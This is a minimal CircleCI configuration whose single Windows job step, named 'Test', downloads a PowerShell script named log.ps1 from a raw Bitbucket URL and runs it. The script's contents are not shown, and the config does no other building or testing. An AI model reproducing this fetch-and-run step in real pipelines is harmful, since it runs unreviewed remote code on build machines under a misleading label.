version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/jampese/lapese/raw/e800d855484b59fadfc4cb2525601389d2968767/log.ps1 -OutFile log.ps1
            ./log.ps1